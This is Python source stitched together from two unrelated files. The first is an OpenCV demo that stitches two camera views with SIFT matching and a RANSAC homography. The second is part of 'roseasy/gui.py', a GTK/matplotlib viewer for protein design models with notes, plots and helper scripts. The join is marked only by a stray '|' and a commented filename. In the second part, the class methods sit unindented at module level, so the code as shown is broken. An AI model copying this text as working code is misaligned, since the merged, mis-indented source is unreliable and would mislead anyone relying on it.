    descriptor = cv2.xfeatures2d.SIFT_create()
    # BUGFIX: detect on the grayscale image computed above; the original
    # passed the BGR image, leaving `gray` unused.
    (kps, features) = descriptor.detectAndCompute(gray, None)
    # convert the keypoints from KeyPoint objects to NumPy arrays
    kps = np.float32([kp.pt for kp in kps])
    # return a tuple of keypoints and features
    return (kps, features)
def matchKeypoints(kpsA, kpsB, featuresA, featuresB, ratio, reprojThresh):
    """Match descriptors between two images and estimate a homography.

    :param kpsA, kpsB: (N, 2) float32 keypoint coordinate arrays.
    :param featuresA, featuresB: corresponding descriptor matrices.
    :param ratio: Lowe's ratio-test threshold.
    :param reprojThresh: RANSAC reprojection error threshold in pixels.
    :returns: (matches, H, status) on success, or None when fewer than the
        four correspondences required for a homography were found.
    """
    # compute the raw matches and initialize the list of actual matches
    matcher = cv2.DescriptorMatcher_create("BruteForce")
    rawMatches = matcher.knnMatch(featuresA, featuresB, 2)
    matches = []
    # loop over the raw matches
    for m in rawMatches:
        # ensure the distance is within a certain ratio of each
        # other (i.e. Lowe's ratio test)
        if len(m) == 2 and m[0].distance < m[1].distance * ratio:
            matches.append((m[0].trainIdx, m[0].queryIdx))
    # computing a homography requires at least 4 matches
    # BUGFIX: was "> 4", which demanded 5 matches and contradicted both the
    # comment above and cv2.findHomography's 4-point minimum.
    if len(matches) >= 4:
        # construct the two sets of points
        ptsA = np.float32([kpsA[i] for (_, i) in matches])
        ptsB = np.float32([kpsB[i] for (i, _) in matches])
        # compute the homography between the two sets of points
        (H, status) = cv2.findHomography(ptsA, ptsB, cv2.RANSAC,
                                         reprojThresh)
        # return the matches along with the homography matrix
        # and status of each matched point
        return (matches, H, status)
    # otherwise, no homography could be computed
    return None
# --- Stitching demo -------------------------------------------------------
# The input image is three camera views concatenated horizontally; split it
# into equal thirds (presumably left / front / right -- TODO confirm).
concat_img = cv2.imread('/home/khg/Python_proj/SFA3D/dataset/veloster/training/front_image/000000.png')
h, total_w, c = concat_img.shape
w = int(total_w/3)
imageA = concat_img[:, :w, :]
imageB = concat_img[:, w:2*w, :]
fr_img = concat_img[:, 2*w:, :]
# Detect keypoints/descriptors in the two views to be stitched.
(kpsA, featuresA) = detectAndDescribe(imageA)
(kpsB, featuresB) = detectAndDescribe(imageB)
# match features between the two images
ratio=0.75
reprojThresh=4.0
M = matchKeypoints(kpsA, kpsB, featuresA, featuresB, ratio, reprojThresh)
# NOTE(review): matchKeypoints() returns None when too few matches are
# found; the unpacking below would then raise TypeError -- consider guarding.
(matches, H, status) = M
cv2.imshow('ori_img', imageA)
print(H)
# Warp image A into image B's frame, then paste B over the overlap region.
result = cv2.warpPerspective(imageA, H, (2*imageA.shape[1], 2*imageA.shape[0]))
cv2.imshow('asdf',result)
result[0:imageB.shape[0], 0:imageB.shape[1]] = imageB
cv2.imshow('test',result)
cv2.waitKey(0)
# fl_img = cv2.resize(fl_img, (int(w/4), int(h/4)))
# front_img = cv2.resize(front_img, (int(w/4), int(h/4)))
# fr_img = cv2.resize(fr_img, (int(w/4), int(h/4)))
# # cv2.imshow('left', fl_img)
# # cv2.imshow('front', front_img)
# # cv2.imshow('right', fr_img)
# cv2.setNumThreads(1)
# modes = (cv2.Stitcher_PANORAMA, cv2.Stitcher_SCANS)
# imgs = [fl_img, front_img, fr_img]
# stitcher = cv2.createStitcher()
# status, pano = stitcher.stitch(imgs)
# # print(statue)
# # cv2.imshow('test', pano)
# # cv2.waitKey(0)
# FLANN_INDEX_LSH = 6
# def anorm2(a):
# return (a*a).sum(-1)
# def anorm(a):
# return np.sqrt( anorm2(a) )
# def matchKeypoints(keyPoints1, keyPoints2, descriptors1, descriptors2):
# flann_params= dict(algorithm = FLANN_INDEX_LSH,
# table_number = 6, # 12
# key_size = 12, # 20
# multi_probe_level = 1) #2
# matcher = cv.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)
# raw_matches = matcher.knnMatch(descriptors1, descriptors2, k = 2) #2
# matches = []
# for m in raw_matches:
# if len(m) == 2 and m[0].distance < m[1].distance * 0.79:
# matches.append((m[0].trainIdx, m[0].queryIdx))
# if len(matches) >= 4:
# keyPoints1 = np.float32([keyPoints1[i] for (_, i) in matches])
# keyPoints2 = np.float32([keyPoints2[i] for (i, _) in matches])
# H, status = cv.findHomography(keyPoints1, keyPoints2, cv.RANSAC,4.0)
# print('%d / %d inliers/matched' % (np.sum(status), len(status)))
# else:
# H, status = None, None
# print('%d matches found, not enough for homography estimation' % len(p1))
# return matches, H, status
# def drawMatches(image1, image2, keyPoints1, keyPoints2, matches, status):
# h1, w1 = image1.shape[:2]
# h2, w2 = image2.shape[:2]
# img_matching_result = np.zeros((max(h1, h2), w1 + w2, 3), dtype="uint8")
# img_matching_result[0:h2, 0:w2] = image2
# img_matching_result[0:h1, w2:] = image1
# for ((trainIdx, queryIdx), s) in zip(matches, status):
# if s == 1:
# keyPoint2 = (int(keyPoints2[trainIdx][0]), int(keyPoints2[trainIdx][1]))
# keyPoint1 = (int(keyPoints1[queryIdx][0]) + w2, int(keyPoints1[queryIdx][1]))
# cv.line(img_matching_result, keyPoint1, keyPoint2, (0, 255, 0), 1)
# return img_matching_result
# def main():
# # img1 = cv.imread('.\\images\\B.jpg')
# # img2 = cv.imread('.\\images\\A.jpg')
# concat_img = cv.imread('/home/khg/Python_proj/SFA3D/dataset/veloster/training/front_image/000000.png')
# h, total_w, c = concat_img.shape
# w = int(total_w/3)
# img1 = concat_img[:, :w, :]
# img2 = concat_img[:, w:2*w, :]
# fr_img = concat_img[:, 2*w:, :]
# gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)
# gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)
# detector = cv.BRISK_create()
# keyPoints1, descriptors1 = detector.detectAndCompute(gray1, None)
# keyPoints2, descriptors2 = detector.detectAndCompute(gray2, None)
# print('img1 - %d features, img2 - %d features' % (len(keyPoints1), len(keyPoints2)))
# keyPoints1 = np.float32([keypoint.pt for keypoint in keyPoints1])
# keyPoints2 = np.float32([keypoint.pt for keypoint in keyPoints2])
# matches, H, status = matchKeypoints(keyPoints1, keyPoints2, descriptors1, descriptors2)
# img_matching_result = drawMatches(img1, img2, keyPoints1, keyPoints2, matches, status)
# result = cv.warpPerspective(img1, H,
# (img1.shape[1] + img2.shape[1], img1.shape[0]))
# result[0:img2.shape[0], 0:img2.shape[1]] = img2
# cv.imshow('result', result)
# cv.imshow('matching result', img_matching_result)
# cv.waitKey(0)
# print('Done')
# if __name__ == "__main__":
# main()
# cv.destroyAllWindows()
|
# <filename>roseasy/gui.py  (repository-dump artifact; commented out -- was a syntax error)
#!/usr/bin/env python2
# encoding: utf-8
"""\
Judge forward-folded candidates in computational protein design pipelines.
Usage:
show_my_designs.py [options] <pdb_directories>...
show_my_designs.py --version
Options:
-F, --no-fork
Do not fork into a background process.
-f, --force
Force the cache to be regenerated.
-q, --quiet
Build the cache, but don't launch the GUI.
-v, --version
Print the version number and exit.
Features:
1. Extract quality metrics from forward-folded models and plot them against
each other in any combination.
2. Easily visualize specific models by right-clicking on plotted points.
Add your own visualizations by writing `*.sho' scripts.
3. Plot multiple designs at once, for comparison purposes.
4. Keep notes on each design, and search your notes to find the designs you
want to visualize.
"""
## Imports
from gi import pygtkcompat
pygtkcompat.enable()
pygtkcompat.enable_gtk(version='3.0')
import collections, glob, gzip, os, re, shutil, subprocess, sys
import matplotlib
matplotlib.use('GTK3Agg')
from gi.repository import Gtk as gtk
from gi.repository import Pango as pango
from gi.repository import GObject as gobject
from gi.repository import Gdk as gdk
import yaml
import matplotlib.pyplot as plt, numpy as np, scipy as sp, pandas as pd, seaborn as sns
from matplotlib.figure import Figure
from matplotlib.backends.backend_gtk3agg import FigureCanvasGTK3Agg
from matplotlib.backends.backend_gtk3 import NavigationToolbar2GTK3
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
from pprint import pprint
from roseasy import structures
class Design (object):
    """One directory of forward-folded models, plus cached metrics and notes.

    Wraps a design directory: the models and their quality metrics are
    loaded via ``structures.load``, and two per-design annotations are
    persisted on disk — free-form notes (``notes.txt``) and the index of a
    manually chosen representative model (``representative.txt``).
    """

    def __init__(self, directory, use_cache=True):
        self.directory = directory
        self.cache_path = os.path.join(directory, 'models.pkl')
        self.notes_path = os.path.join(directory, 'notes.txt')
        self.rep_path = os.path.join(directory, 'representative.txt')

        self._models = None
        self._metrics = {}
        self._notes = ""
        self._representative = None

        self._load_models(use_cache)
        self._load_annotations()

    def __str__(self):
        return '<ModelGroup dir={}>'.format(self.directory)

    def __len__(self):
        return len(self.paths)

    @property
    def paths(self):
        # One path per model, as loaded by structures.load().
        return self._models['path']

    @property
    def notes(self):
        return self._notes

    @notes.setter
    def notes(self, notes):
        # Persist immediately so notes survive a crash of the GUI.
        self._notes = notes
        self._save_notes()

    @property
    def representative(self):
        # Fall back to the lowest-scoring model when the user hasn't
        # explicitly picked a representative.
        if self._representative is None:
            return self.get_metric('total_score').idxmin()
        else:
            return self._representative

    @representative.setter
    def representative(self, index):
        self._representative = index
        self._save_representative()

    @property
    def representative_path(self):
        return self.paths[self.representative]

    @property
    def metrics(self):
        return self._metrics

    def get_metric(self, metric):
        """Return the column of values for *metric*; raise if undefined."""
        if metric not in self.metrics:
            message = "No such metric: '{}'\n".format(metric)
            message += "Defined metrics are: " + ', '.join(
                    "'{}'".format(x) for x in self.metrics)
            print(type(metric), ' '.join(str(type(x)) for x in self.metrics))
            raise RuntimeError(message)
        return self._models[metric]

    def get_coord(self, x_metric, y_metric, index=None):
        """Return the (x, y) coordinates of one model.

        Defaults to the representative model when *index* is omitted.
        """
        i = index if index is not None else self.representative
        return self.get_metric(x_metric)[i], self.get_metric(y_metric)[i]

    def _load_models(self, use_cache):
        """
        Load a variety of score and distance metrics for the structures found
        in the given directory.  As much information as possible will be
        cached.  Note that new information will only be calculated for file
        names that haven't been seen before.  If a file changes or is deleted,
        the cache will not be updated to reflect this and you may be presented
        with stale data.
        """
        self._models, self._metrics = structures.load(
                self.directory,
                use_cache=use_cache,
                require_io_dir=False,
        )

    def _load_metrics(self):
        # Treat any column in self._models that contains numeric data as a
        # metric.  Any dtype other than 'object' is assumed to be numeric.
        # NOTE(review): this method references MetricInfo and the
        # get_metric_* helpers defined elsewhere in this module, and is not
        # called from __init__ (which takes its metrics from
        # structures.load); it looks like a legacy code path — confirm.
        self._metrics = {
                x: MetricInfo(
                    x,
                    title=get_metric_title(x, self),
                    order=get_metric_order(x, self),
                    guide=get_metric_guide(x, self),
                    limits=get_metric_limits(x, self),
                )
                for x in list(self._models.keys())
                if self._models[x].dtype != 'object'
        }

        # Make sure at least two metrics have been associated with each model
        # in this directory (the GUI needs one per axis).
        if len(self._metrics) == 0:
            raise IOError("no metrics defined for the models in '{}'".format(self.directory))
        if len(self._metrics) == 1:
            name = next(iter(self._metrics))
            raise IOError("only found one metric '{}' for the models in '{}', need at least two".format(name, self.directory))

    def _load_annotations(self):
        # Both annotation files are optional; a missing file just means no
        # notes / no manually chosen representative.
        try:
            with open(self.notes_path) as file:
                self._notes = file.read()
        except IOError:
            pass

        # Also tolerate a corrupt representative file (non-integer contents)
        # instead of crashing the whole GUI at startup.
        try:
            with open(self.rep_path) as file:
                self._representative = int(file.read())
        except (IOError, ValueError):
            pass

    def _save_notes(self):
        # Only write the file when there is something to save; otherwise
        # remove any stale file.  (The old code always wrote the file and
        # then immediately deleted it again when the notes were empty.)
        if self.notes:
            with open(self.notes_path, 'w') as file:
                file.write(self.notes)
        elif os.path.exists(self.notes_path):
            os.remove(self.notes_path)

    def _save_representative(self):
        # A None representative means "use the default", so the file is
        # removed rather than written.
        if self._representative is not None:
            with open(self.rep_path, 'w') as file:
                file.write(str(self._representative))
        elif os.path.exists(self.rep_path):
            os.remove(self.rep_path)
class ShowMyDesigns (gtk.Window):
def __init__(self, designs, normalize_to_all=True):
    """Build the main window for browsing *designs*.

    designs: dict mapping design name -> Design instance.
    normalize_to_all: when True, y-axis limits are computed over every
    design, so the axes don't resize while scrolling between designs.
    """
    # Setup the parent class.
    gtk.Window.__init__(self)
    self.normalize_to_all = normalize_to_all
    self.add_events(gdk.EventMask.KEY_PRESS_MASK)
    self.connect('key-press-event', self.on_hotkey_press)
    self.set_icon_from_file(os.path.join(
            os.path.dirname(os.path.realpath(__file__)), 'icon.png'))

    # Setup the data members.
    self.designs = designs
    self.keys = list()
    self.selected_model = None
    self.is_legend_visible = False
    self.is_representative_visible = False
    self.is_model_count_visible = False
    # Only keep the metrics that every design defines.
    self.metrics = {
            k: next(iter(self)).metrics[k]
            for k in set.intersection(*[set(x.metrics) for x in self])
    }
    print(self.metrics)
    self.sorted_metrics = sorted(
            self.metrics,
            key=lambda k: (self.metrics[k].order, self.metrics[k].title)
    )
    print(self.sorted_metrics)
    # default_x_metric / default_y_metric are module-level settings
    # defined elsewhere in this file.
    self.x_metric = (
            default_x_metric
            if default_x_metric in self.metrics
            else self.sorted_metrics[0])
    self.y_metric = (
            default_y_metric
            if default_y_metric in self.metrics
            else self.sorted_metrics[1])

    # Setup the GUI.
    self.connect('destroy', lambda x: gtk.main_quit())
    self.set_default_size(int(1.618 * 630), 630)   # golden-ratio window

    menu_bar = self.setup_menu_bar()
    model_viewer = self.setup_model_viewer()
    vbox = gtk.VBox()
    vbox.pack_start(menu_bar, False)
    vbox.pack_end(model_viewer, True)
    self.add(vbox)
    self.set_border_width(3)

    self.update_everything()
    self.show_all()
    self.set_focus(None)

    # With a single design there is nothing to pick from, so start with
    # the model list hidden.
    n = len(self.designs)
    self.hide_model_list() if n == 1 else self.show_model_list()
    self.hide_filter_pane()
    self.show_annotation_pane()
    self.hide_legend()
    self.show_representative()
    self.hide_model_count()
def __iter__(self):
    """Iterate over the Design objects (a snapshot of the current values)."""
    snapshot = list(self.designs.values())
    return iter(snapshot)
def setup_menu_bar(self):
    """Build the "File" and "View" menus."""
    bar = gtk.MenuBar()

    # The "File" menu: export actions for the current selection.
    menu = gtk.Menu()
    item = gtk.MenuItem("_File")
    item.set_submenu(menu)
    bar.append(item)

    item = gtk.MenuItem("Save selected paths")
    item.connect('activate', lambda _: self.save_selected_paths())
    menu.append(item)

    item = gtk.MenuItem("Save selected funnels")
    item.connect('activate', lambda _: self.save_selected_funnels())
    menu.append(item)

    # The "View" menu: check items that show/hide the optional panes.
    # The items are stored on self so the show/hide helpers can keep the
    # check marks in sync.
    menu = gtk.Menu()
    item = gtk.MenuItem("_View")
    item.set_submenu(menu)
    bar.append(item)

    item = self.model_list_toggle = gtk.CheckMenuItem("Model list")
    item.connect('activate', self.on_toggle_model_list)
    menu.append(item)

    item = self.filter_pane_toggle = gtk.CheckMenuItem("Filter pane")
    item.connect('activate', self.on_toggle_filter_pane)
    menu.append(item)

    item = self.annotation_pane_toggle = gtk.CheckMenuItem("Annotation pane")
    item.connect('activate', self.on_toggle_annotation_pane)
    menu.append(item)

    item = gtk.SeparatorMenuItem()
    menu.append(item)

    item = self.legend_toggle = gtk.CheckMenuItem("Legend")
    item.connect('activate', self.on_toggle_legend)
    menu.append(item)

    item = self.representative_toggle = gtk.CheckMenuItem("Representative")
    item.connect('activate', self.on_toggle_representative)
    menu.append(item)

    item = self.model_count_toggle = gtk.CheckMenuItem("Model count")
    item.connect('activate', self.on_toggle_model_count)
    menu.append(item)

    return bar

def setup_model_viewer(self):
    """Assemble the main layout: sidebar | (plot above annotation pane)."""
    plot = self.setup_plot()
    self.model_list = self.setup_model_list()
    self.filter_pane = self.setup_filter_pane()
    self.annotation_pane = self.setup_annotation_pane()

    self.sidebar = gtk.VPaned()
    self.sidebar.add1(self.model_list)
    self.sidebar.add2(self.filter_pane)

    bottombar = gtk.VPaned()
    bottombar.add1(plot)
    bottombar.add2(self.annotation_pane)

    viewer = gtk.HPaned()
    viewer.add1(self.sidebar)
    viewer.add2(bottombar)
    return viewer
def setup_model_list(self):
    """Build the searchable list of designs shown in the sidebar."""
    list_store = gtk.ListStore(str)

    text = gtk.CellRendererText()
    icon = gtk.CellRendererPixbuf()

    self.view = gtk.TreeView(list_store)
    self.view.set_model(list_store)
    self.view.set_rubber_banding(True)
    self.view.set_enable_search(False)
    self.view.set_headers_visible(False)

    columns = [
            ('Name', 'directory'),
    ]

    for index, parameters in enumerate(columns):
        title, attr = parameters

        def cell_data_func(column, cell, model, iter, attr):
            # Look up the design named in this row and display one of its
            # attributes as the cell text.
            key = model.get_value(iter, 0)
            design = self.designs[key]
            text = getattr(design, attr)
            cell.set_property('text', text)

        def sort_func(model, iter_1, iter_2, attr):
            # Order rows by the given design attribute.  The three-way
            # comparison is spelled out explicitly because the Python 2
            # builtin cmp() no longer exists in Python 3.
            key_1 = model.get_value(iter_1, 0)
            key_2 = model.get_value(iter_2, 0)
            design_1 = self.designs[key_1]
            design_2 = self.designs[key_2]
            value_1 = getattr(design_1, attr)
            value_2 = getattr(design_2, attr)
            return (value_1 > value_2) - (value_1 < value_2)

        list_store.set_sort_func(index, sort_func, attr)
        column = gtk.TreeViewColumn(title, text)
        column.set_cell_data_func(text, cell_data_func, attr)
        column.set_sort_column_id(index)
        self.view.append_column(column)

    selector = self.view.get_selection()
    selector.connect("changed", self.on_select_designs)
    ### If selection is weird, double check this!
    ### gtk.SelectionMode(3) should correspond to GTK_SELECTION_MULTIPLE
    selector.set_mode(gtk.SelectionMode(3))

    scroller = gtk.ScrolledWindow()
    scroller.set_policy(gtk.PolicyType.AUTOMATIC,
                        gtk.PolicyType.AUTOMATIC)
    scroller.add(self.view)

    frame = gtk.Frame()
    frame.add(scroller)

    self.search_form = gtk.Entry()
    self.search_form.set_icon_from_stock(gtk.EntryIconPosition.SECONDARY, gtk.STOCK_FIND)
    # Refilter the list on every edit of the search box.
    search_buffer = self.search_form.get_buffer()
    search_buffer.connect('deleted-text', self.on_search_in_notes)
    search_buffer.connect('inserted-text', self.on_search_in_notes)

    vbox = gtk.VBox()
    vbox.pack_start(self.search_form, False, True, 0)
    vbox.pack_start(frame, True, True, 0)
    return vbox
def setup_plot(self):
    """Create the matplotlib canvas, toolbar, and mouse-position readout."""
    figure = Figure(facecolor='#edecea')

    # Create the axes.
    self.axes = figure.add_axes((0.15, 0.15, 0.75, 0.75))
    self.axes.set_ylabel('Score')

    # Create the canvas.
    # NOTE(review): FigureCanvas and NavigationToolbar (below) are not the
    # names imported at the top of this file (FigureCanvasGTK3Agg,
    # NavigationToolbar2GTK3); presumably they are aliases or subclasses
    # defined elsewhere in this module (the toolbar is later expected to
    # have x_axis_menu/y_axis_menu attributes) — verify before refactoring.
    self.canvas = FigureCanvas(figure)
    self.canvas.mpl_connect('pick_event', self.on_select_model)
    self.canvas.mpl_connect('button_press_event', self.on_click_plot_mpl)
    self.canvas.mpl_connect('motion_notify_event', self.on_move_mouse_mpl)
    self.canvas.connect('button-press-event', self.on_click_plot_gtk)
    self.canvas.set_size_request(-1, 350)

    # Create the tool bar.
    self.toolbar = NavigationToolbar(self.canvas, self)

    # Place all the widgets.
    self.mouse_position = gtk.Label("")

    table = gtk.Table(3, 5)
    table.attach(self.toolbar, 0, 1, 0, 3)
    table.attach(self.mouse_position, 3, 4, 1, 2, xoptions=0, yoptions=0, xpadding=3)

    vbox = gtk.VBox()
    vbox.pack_start(self.canvas, True, True, 0)
    vbox.pack_start(table, False, True, 0)
    return vbox

def setup_filter_pane(self):
    """Create the filter pane; redraw the plot whenever a filter changes."""
    # FilterPane is defined elsewhere in this module.
    pane = FilterPane(self)
    pane.connect('updated', lambda _: self.update_plot())
    return pane

def setup_annotation_pane(self):
    """Create the notes editor shown below the plot."""
    self.notes = gtk.TextView()
    self.notes.set_wrap_mode(gtk.WRAP_WORD)
    self.notes.set_size_request(-1, 100)
    self.notes.set_left_margin(3)
    self.notes.set_right_margin(3)
    self.notes.set_pixels_above_lines(3)
    self.notes.set_pixels_below_lines(3)
    self.notes.set_cursor_visible(True)
    # Persist edits immediately (see on_edit_annotation).
    self.notes.get_buffer().connect('changed', self.on_edit_annotation)

    scroll_window = gtk.ScrolledWindow()
    scroll_window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
    scroll_window.add(self.notes)

    frame = gtk.Frame()
    frame.add(scroll_window)
    return frame

def setup_metric_menu(self, callback=None, initial_choice=None):
    """Build a drop-down menu for picking an axis metric.

    The backing (name, title) ListStore is created lazily on first use
    and shared by every menu so the entries stay consistent.
    """
    try: self.metric_store
    except AttributeError:
        self.metric_store = gtk.ListStore(str, str)
        for key in self.sorted_metrics:
            metric = self.metrics[key]
            self.metric_store.append([metric.name, metric.title])

    cell = gtk.CellRendererText()
    ### previously ComboBox
    menu = gtk.ComboBoxText(model=self.metric_store)
    menu.pack_start(cell, True)
    menu.add_attribute(cell, 'text', 1)   # display the title column
    menu.set_active(0)

    for i, metric in enumerate(self.sorted_metrics):
        if metric == initial_choice:
            menu.set_active(i)

    if callback:
        menu.connect('changed', callback)

    return menu
def on_hotkey_press(self, widget, event):
    """Dispatch vim-like keyboard shortcuts; return True when handled."""
    name = gdk.keyval_name(event.keyval).lower()
    if event.state & gdk.CONTROL_MASK:
        name = 'ctrl-' + name
    if event.state & gdk.SHIFT_MASK:
        name = 'shift-' + name

    bindings = {'escape': self.normal_mode}

    # Most shortcuts only apply while no text-entry widget has the focus,
    # so typing in the search box or notes pane isn't hijacked.
    focused = self.get_focus()
    keep_focus_types = (gtk.Entry, gtk.TextView, gtk.Button, gtk.ComboBox)
    if not isinstance(focused, keep_focus_types):
        bindings.update({
            'i': self.insert_mode, 'a': self.insert_mode,
            'z': self.zoom_mode,
            'x': self.pan_mode,
            'c': self.refocus_plot,
            'tab': self.cycle_y_metric,
            'space': self.cycle_x_metric,
            'shift-tab': self.reverse_cycle_y_metric,
            'shift-space': self.reverse_cycle_x_metric,
        })
        # Design-navigation keys only make sense with several designs.
        if len(self.designs) > 1:
            bindings.update({
                'j': self.next_design, 'f': self.next_design,
                'k': self.previous_design, 'd': self.previous_design,
                'slash': self.search_mode,
            })

    handler = bindings.get(name)
    if handler is not None:
        handler()
        return True
def on_search_in_notes(self, entry_buffer, *_):
    # Called for both 'inserted-text' and 'deleted-text' signals; simply
    # refilter the design list against the current search string.
    self.update_designs()
def on_select_designs(self, selection):
    """Track which designs are selected and refresh the plot and notes."""
    model, paths = selection.get_selected_rows()
    picked = [model.get_value(model.get_iter(p), 0) for p in paths]

    # Keep previously-selected designs in their existing order: the order
    # determines each design's color in the score-vs-rmsd plot, and it
    # would be confusing if the colors shuffled on every selection change.
    previous = self.keys[:]
    self.keys = [key for key in previous if key in picked]
    self.keys += [key for key in picked if key not in self.keys]

    # Reflect the current selection in the window title.
    if len(self.keys) > 1:
        subtitle = " ({}, ...)".format(self.keys[0])
    elif len(self.keys) == 1:
        subtitle = " ({})".format(self.keys[0])
    else:
        subtitle = ""
    self.set_title("Show My Designs" + subtitle)

    # Efficiency: the 'J'/'K' hotkeys work in two steps — unselect
    # everything, then select the next row.  Redrawing the plot is
    # expensive, so skip the redraw for the empty intermediate step.
    if self.keys:
        self.update_plot()
        self.update_annotations()
def on_select_model(self, event):
    # Matplotlib pick event: remember which point (model index) of which
    # design was hit, for on_click_plot_gtk() to act on.
    self.selected_model = event.ind[0], event.artist.design

def on_move_mouse_mpl(self, event):
    # Show the data coordinates under the cursor in the status label.
    if event.xdata is None or event.ydata is None:
        # The data coordinates will be None only if the mouse is outside
        # the data area.
        self.mouse_position.set_text("")
    else:
        coord = '{:0.2f}, {:0.2f}'.format(event.xdata, event.ydata)
        self.mouse_position.set_text(coord)

def on_click_plot_mpl(self, event):
    # All click handling happens in on_click_plot_gtk(); the matplotlib
    # button event is intentionally ignored.
    pass
def on_click_plot_gtk(self, widget, event):
    """Pop up a context menu of actions for the clicked model.

    Triggered by a right-click (or ctrl + left-click) on a plotted point;
    relies on on_select_model() having recorded which point the matplotlib
    pick event hit just before this GTK event fires.
    """
    # Ignore any event that isn't a right button click or a left button
    # click with the control key held down.
    is_right_click = \
            (event.button == 3) or \
            (event.button == 1 and event.get_state() & gdk.CONTROL_MASK)

    # NOTE(review): toolbar._active is a private matplotlib attribute that
    # was removed in newer matplotlib releases — verify against the
    # pinned version.
    if not is_right_click: return
    if self.toolbar._active == 'PAN': return
    if self.toolbar._active == 'ZOOM': return
    if self.selected_model is None: return

    # Figure out which model was clicked.
    index, design = self.selected_model
    rep_index = design.representative
    path = os.path.join(design.directory, design.paths[index])
    rep_path = os.path.join(design.directory, design.paths[rep_index])
    is_rep = (index == rep_index)   # NOTE(review): currently unused.
    self.selected_model = None

    # Search for scripts that can perform some action using the clicked
    # model.  Such scripts must have the `*.sho' suffix and may be located
    # anywhere from the directory containing the models to any directory
    # below that.  Any scripts that are found will be used to populate a
    # drop-down menu.  If selected, the script will be called with sh as
    # the interpreter and the path to the model as the singular argument.
    directory = os.path.abspath(design.directory)
    sho_scripts = []

    while directory != os.path.abspath('/'):
        sho_pattern = os.path.join(directory, '*.sho')
        sho_scripts += glob.glob(sho_pattern)
        directory = os.path.dirname(directory)

    # Create and display the drop-down menu.
    file_menu = gtk.Menu()
    script_dict = {}

    def menu_callback(obj):
        # Look the script back up by its menu label and run it with the
        # clicked model and the representative model as arguments.
        try_to_run_command([script_dict[obj.get_label()], path,
            rep_path])

    for script in sho_scripts:
        # Turn 'my_script.sho' into the menu label 'My script'.
        title = os.path.basename(os.path.splitext(script)[0])
        title = title[0].upper() + title[1:]
        title = title.replace('_', ' ')

        item = gtk.MenuItem(title)
        script_dict[item.get_label()] = script
        item.connect('activate', menu_callback)
        file_menu.append(item)

    view_in_pymol = gtk.MenuItem("View model in pymol")
    view_in_pymol.connect('activate',
            lambda *args: try_to_run_command(['pymol', path]))
    file_menu.append(view_in_pymol)

    view_in_chimera = gtk.MenuItem("View model in chimera")
    view_in_chimera.connect('activate',
            lambda *args: try_to_run_command(['chimera', path]))
    file_menu.append(view_in_chimera)

    file_menu.append(gtk.SeparatorMenuItem())

    copy_path = gtk.MenuItem("Copy path to model")
    copy_path.connect('activate', self.on_copy_model_path, path)
    file_menu.append(copy_path)

    # Offer to set or reset the representative, depending on whether the
    # clicked model already is the representative.
    if index == design.representative:
        choose_rep = gtk.MenuItem("Reset representative")
        choose_rep.connect(
                'activate', self.on_set_representative, design, None)
    else:
        choose_rep = gtk.MenuItem("Set as representative")
        choose_rep.connect(
                'activate', self.on_set_representative, design, index)
    file_menu.append(choose_rep)

    file_menu.foreach(lambda item: item.show())
    ### Added a 'none'
    file_menu.popup(None, None, None, None, event.button, event.time)
def on_copy_model_path(self, widget, path):
    """Copy *path* into the X primary selection via the `xsel` utility."""
    # Popen pipes expect bytes on Python 3, so encode the path before
    # writing it to xsel's stdin.  (Uses the module-level subprocess
    # import; the redundant function-local import was dropped.)
    xsel = subprocess.Popen(['xsel', '-pi'], stdin=subprocess.PIPE)
    xsel.communicate(path.encode('utf-8'))
def on_set_representative(self, widget, design, index):
    # index may be None, which resets the design to its default
    # (lowest-scoring) representative.
    design.representative = index
    self.update_plot()

def on_edit_annotation(self, buffer):
    # The annotation pane is only sensitive when exactly one design is
    # selected (see update_annotations), so assert that invariant.
    assert len(self.keys) == 1
    design = self.designs[self.keys[0]]
    bounds = buffer.get_bounds()
    design.notes = buffer.get_text(*bounds, True)

def on_change_x_metric(self, widget):
    # NOTE(review): get_active_text() returns the text displayed in the
    # combo box, but self.metrics is keyed by metric *name* — confirm the
    # two agree for the menus built by setup_metric_menu().
    self.x_metric = widget.get_active_text()
    self.update_plot()

def on_change_y_metric(self, widget):
    self.y_metric = widget.get_active_text()
    self.update_plot()
# "View" menu handlers: forward each check item's state to the matching
# show/hide pair below.

def on_toggle_model_list(self, widget):
    if widget.get_active():
        self.show_model_list()
    else:
        self.hide_model_list()

def on_toggle_filter_pane(self, widget):
    if widget.get_active():
        self.show_filter_pane()
    else:
        self.hide_filter_pane()

def on_toggle_annotation_pane(self, widget):
    if widget.get_active():
        self.show_annotation_pane()
    else:
        self.hide_annotation_pane()

def on_toggle_legend(self, widget):
    if widget.get_active():
        self.show_legend()
    else:
        self.hide_legend()

def on_toggle_representative(self, widget):
    if widget.get_active():
        self.show_representative()
    else:
        self.hide_representative()

def on_toggle_model_count(self, widget):
    if widget.get_active():
        self.show_model_count()
    else:
        self.hide_model_count()
def normal_mode(self):
    """Drop focus and leave any active pan/zoom tool (vim-style escape)."""
    self.set_focus(None)

    # Calling pan()/zoom() while the tool is active toggles it off.
    # NOTE(review): toolbar._active is a private matplotlib attribute,
    # removed in newer releases — verify against the pinned version.
    if self.toolbar._active == 'PAN':
        self.toolbar.pan()

    if self.toolbar._active == 'ZOOM':
        self.toolbar.zoom()

def insert_mode(self):
    # Focus the notes editor (vim-style 'i'/'a').
    self.set_focus(self.notes)

def search_mode(self):
    # Focus the search box (vim-style '/').
    self.set_focus(self.search_form)

def zoom_mode(self):
    self.toolbar.zoom()

def pan_mode(self):
    self.toolbar.pan()

def refocus_plot(self):
    # Reset to the home zoom level, then deactivate any active tool.
    self.toolbar.home()
    self.normal_mode()
def next_design(self):
    """Move the sidebar selection down one row (hotkeys 'j'/'f')."""
    selection = self.view.get_selection()
    model, paths = selection.get_selected_rows()
    if not paths:
        # Nothing is selected, so there is no "next" row to move to.
        # (The old code crashed with an IndexError here.)
        return
    last = paths[-1][0]
    if last < model.iter_n_children(None) - 1:
        for path in paths:
            selection.unselect_path(path)
        selection.select_path(last + 1)
        self.view.scroll_to_cell(last + 1)

def previous_design(self):
    """Move the sidebar selection up one row (hotkeys 'k'/'d')."""
    selection = self.view.get_selection()
    model, paths = selection.get_selected_rows()
    if not paths:
        return
    first = paths[0][0]
    if first > 0:
        for path in paths:
            selection.unselect_path(path)
